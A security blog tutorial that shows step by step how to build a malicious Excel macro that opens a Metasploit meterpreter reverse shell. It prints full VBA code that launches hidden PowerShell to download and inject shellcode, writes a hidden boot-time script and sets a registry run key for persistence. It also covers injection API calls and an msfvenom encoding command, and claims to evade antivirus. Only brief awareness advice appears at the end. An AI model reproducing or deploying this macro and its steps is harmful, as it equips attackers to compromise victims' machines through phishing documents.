Excel Malware with Metasploit


Today the most dangerous malware like rasomware and crypto malware infect the systems propagating via email or social network. A  document (doc, execl, pdf, javascript) containing malware code is distributed to end users; if some click on it, its system is infected.

The malware payload (javascript or visual basic) contains only the code for downloading the binary that executes the malware intentions.The malware payload doens’t have any checksum predictable or use official windows functions: this makes difficult to be detected by Anti Virus.

In this article I will show how to create a excel document containing visual basic script that permit to take remotely control of the system infected using metasploit framework. The only prerequisite is to have powershell available on the system.

I will use as infected attacked Windows 2010 with McAfee Antivirus and Kali SO as attacker system.

The goal is to spread awareness about the modern hackers attack and to suggest some simple advise to defense about that. Remember: don’t use this for malicious actions but only for ethical reasons.

Software used:

  1. Invoke-Shell.ps1: power shell code for Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. Written by Matthew Graeber.
  2. GenerateMacro.ps1: Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. Written by Matthew Graeber.
  3. Metasploit framework available on Kali.

Le’t start with explaining how to use metasploit framework for this purpose.

Metasploit framework

Metasploit framework is a penetration tool used for executing exploit code against systems and network. The framework contains a lot of exploit codes, called module, for known vulnerabilities ready to attack the target systems. The module are in ruby language and permit to select Payload that are executed in the attacked system.

A Payload could be a simple reverse shell: a shell code that creates a connection from attacked system back to the attacker. Meterpreter payload is delivered to windows systems: it permit to have a shell more power than dos shell.

For our scope, we need to configure a windows reverse shell ready to be deliverd to attacked client when the visual basic script requests it via get http command. The payload downloaded is injected in the power shell process run under visual basic.

Following how to run a reverse shell by metasploit:

Metaspoit Reverse Shell

The payload hanlder is listening on 443 port and is ready to be delivered. This reverse shell will be attached to process attacked as dll and executed as thread calling the code inside the DllMain() function.

Let’s describe how to make the malware visual basic.

Generate Excel with Malware Macro

For generating the excel containing the malware macro, I will use  Generate-Macro.ps power shell script available at https://github.com/enigma0x3/Generate-Macro. Following the excel’s generation:

Generate Macro for Malware Excel

The most important parameter are: URL of Invoke-Shellcode script (https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1) and Address and Port of Remote Attacker.

The visual Basic inside the excel is the following:

Sub Auto_Open()
End Sub
Public Function Execute() As Variant
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2”)
Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”)
objProcess.Create “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX (New-Object Net.WebClient).DownloadString(“https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1″); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 443 -Force”, Null, objConfig, intProcessID
End Function
Public Function Persist() As Variant
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set a = fs.CreateTextFile(“C:\Users\Public\config.txt”, True)
a.WriteLine (“Dim objShell”)
a.WriteLine (“Set objShell = WScript.CreateObject(“”WScript.Shell””)”)
a.WriteLine (“command = “”C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1’)); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 443 -Force”””)
a.WriteLine (“objShell.Run command,0”)
a.WriteLine (“Set objShell = Nothing”)
GivenLocation = “C:\Users\Public\”
OldFileName = “config.txt”
NewFileName = “config.vbs”
Name GivenLocation & OldFileName As GivenLocation & NewFileName
SetAttr “C:\Users\Public\config.vbs”, vbHidden
End Function
Public Function Reg() As Variant
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.RegWrite “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load”, “C:\Users\Public\config.vbs”, “REG_SZ”
Set WshShell = Nothing
End Function
Public Function Start() As Variant
strComputer = “.”
Shell “wscript C:\Users\Public\config.vbs”, vbNormalFocus
End Function

The Execute() function run the power shell script Invoke–Shellcode.ps1 that downloads from attacker server the Meterpreter shell code and injects it in the power shell process (the excel document in this case). I will explain it later.

The Persist() function creates in c:\Users\Public\config.vbs a visual basic script for persistence at boot time.

The Reg() function add a Key on Window Register that run the visual basic above at boot time.

The Start() functions is not useful: the powershell script is already executed in Execute() function.

When the excel is opened and the macro enabled, the power-shell script is run and it connect to attacker server and launch the attack. This what happens:

Reverse attack with Metasploit

A meterpreter shell is available and it’s also possible to have dos shell with shell command.

The Antivirus (McAfee) has not detected the attack because anything is written in the disk and windows power shell functions are used.

Now, let me explain how the Shellcode.ps1 power shell works.

Following, the description of the main power shell commands:

This is the first important instruction. The client connects to attacker for dowloading the shell code:

[Byte[]] $Shellcode32 = $WebClient.DownloadData($Uri):

This allocate memory in the address space of another process and set it to zero.

 $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)

This writes the shell code to an area of memory in a specified process. The shell code is injected as dll and executed as thread.

$WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.Length, [Ref] 0) | Out-Null

Get address of ExitThread function: this is for calling the code as remote thread. Every process in Windows use kernel32.dll library. It  exposes to applications most of the Win32 base APIs.

$ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread

Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread. Call-stub contains two pointers: one to shell code and the other to exit thread function.
$CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32

Allocate inline assembly stub
$RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40)

Write 32-bit assembly stub to remote process memory space
$WriteProcessMemory.Invoke($hProcess, $RemoteStubAddr, $CallStub, $CallStub.Length, [Ref] 0) | Out-Null

Execute shellcode as a remote thread. It creates a thread in the virtual address space of attached process. The first instruction of the thread is the that of shell code downloaded.
$ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)

The shell code  is allocated  in the memory address of process attacked, and executed as thread. You can know more about memory injection in Windows reading this tutorial http://resources.infosecinstitute.com/using-createremotethread-for-dll-injection-on-windows/. This link is for better understandig how metasploit payload work: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads.

After getting the Meterpreter shell is possible to migrate the shell code to another process. It’s is useful in order to have a process attached that normally is not stopped like for example Explorer. In this case, I migrate to a notepad process:

migrate metasploit

The AV didnt’ detect the attack because the shell code is executed as normal DLL without writing it to disk or registering it with the host process.

If we try to run the reverse shell payload as binary the AV detects it. Let’s do it by msfvenom utility.

root@kali:~# msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST= LPORT=443 -b “\x90” -x ./putty.exe -e x86/shikata_ga_nai -f exe -i 10 -o /tmp/winreversetcp.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai chosen with final size 603
Payload size: 603 bytes
Saved as: /tmp/winreversetcp.exe

The shikata_ga_nai option is used for creating a polyformic shell code; the -b option is to avoid NOP assembly istructions; -x is to generate a shell code using putty executable template.

Despite the different attentions, the Antivirus blocked it:

Virus Found

This why the malware payload is saved on the disk and for AV becomes easier detects it.

For creating a reverse binary shell without AV detection is harder: we will try it in the next article.


My suggestion in order to avoid modern attacks is simple: don’t open any document (word, excel, pdf, etc) received by email or social network from unknown sources.

Investing in FW, IPS, Antivirus is right and necessary, but investe time and resources in the education of employees about it is the best weapon against sophisticated attacks.

Organize education phishing campaigns using the approach explained could be a good idea.

Please read another my article that uses this type of attack for getting control of Active Directory system: https://www.securityandit.com/security/active-directory-exploit-with-kali/. Another my article where metasploit is used is https://www.securityandit.com/network/pivoting-the-target-network/.